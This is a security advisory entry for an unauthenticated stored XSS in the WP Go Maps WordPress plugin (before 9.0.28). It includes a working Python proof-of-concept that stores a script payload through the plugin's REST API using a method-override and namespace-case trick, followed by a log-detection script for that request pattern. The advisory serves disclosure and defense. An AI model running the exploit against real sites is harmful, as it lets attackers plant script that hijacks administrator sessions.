WordPress Plugin Vulnerabilities
WP Go Maps < 9.0.28 - Unauthenticated Stored XSS
Description
The plugin does not properly protect most of its REST API routes, which unauthenticated attackers can abuse to store malicious HTML/JavaScript on the site.
Proof of Concept
Run the following Python script, then visit https://vulnerable-site.tld/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1. Alternatively, visit the page where the map is displayed after the fact and click on the affected marker to trigger the XSS.

```
import sys
import requests

if len(sys.argv) != 2:
    print(f'{sys.argv[0]} <target_site_root_url>')
    sys.exit()

url = sys.argv[1].rstrip('/')

# Get list of existing markers
res = requests.get(f'{url}/wp-json/wpgmza/v1/markers').json()
if len(res) == 0:
    print('# No markers found! Make sure the plugin is properly setup.')
    sys.exit()

marker_id = res[0]['id']
print(f'# Found marker ID #{marker_id}, using it to demonstrate the exploit')

print('# Tricking the POST section of the endpoint to store our XSS payload..')
body = {
    'address': '<img src="x" onerror=alert("xss")//">'
}
requests.post(f'{url}/wp-json/wpgmzA/v1/markers?_method=get&random=/wpgmza/v1/markers/{marker_id}', data=body)
```
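A detection sketch for the request shape the script above sends, added here as an example and not part of the original advisory. It assumes combined-format access logs; the sample lines, trait names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (log format is an assumption).
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# REST namespace taken from the advisory's script, matched case-insensitively.
NS = re.compile(r"/wp-json/(wpgmza)(?:/|$)", re.I)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2023:10:00:01 +0000] "GET /wp-json/wpgmza/v1/markers HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '203.0.113.7 - - [12/Dec/2023:10:00:02 +0000] "POST /wp-json/wpgmzA/v1/markers?_method=get&random=/wpgmza/v1/markers/1 HTTP/1.1" 200 87 "-" "python-requests/2.31"',
    '198.51.100.4 - - [12/Dec/2023:10:05:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


def classify(line):
    """Return the suspicious traits found in one access-log line."""
    m = REQ.search(line)
    if not m:
        return []
    parts = urlsplit(m["target"])
    ns = NS.search(unquote(parts.path))
    if not ns:
        return []  # not a request to the plugin's REST namespace
    params = parse_qsl(parts.query, keep_blank_values=True)
    traits = []
    # A POST that asks to be treated as another method via the query string.
    if m["method"] == "POST" and any(k.lower() == "_method" for k, _ in params):
        traits.append("method-override")
    # Namespace spelled with unexpected letter case.
    if ns.group(1) != "wpgmza":
        traits.append("namespace-case-variant")
    # A plugin route path carried inside a query-string value.
    if any("/wpgmza/" in v.lower() for _, v in params):
        traits.append("route-in-query-value")
    return traits


def scan(lines):
    """Map 1-based line number -> traits for every line with at least one trait."""
    return {n: t for n, line in enumerate(lines, 1) if (t := classify(line))}


if __name__ == "__main__":
    for lineno, traits in scan(SAMPLE_LOG).items():
        print(lineno, ", ".join(traits))
```

A marker listing followed by a flagged POST from the same client matches the sequence in the script above.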
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Marc Montpas
Submitter
Marc Montpas
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-12-12 (about 5 months ago)
Added
2023-12-12 (about 5 months ago)
Last Updated
2023-12-12 (about 5 months ago)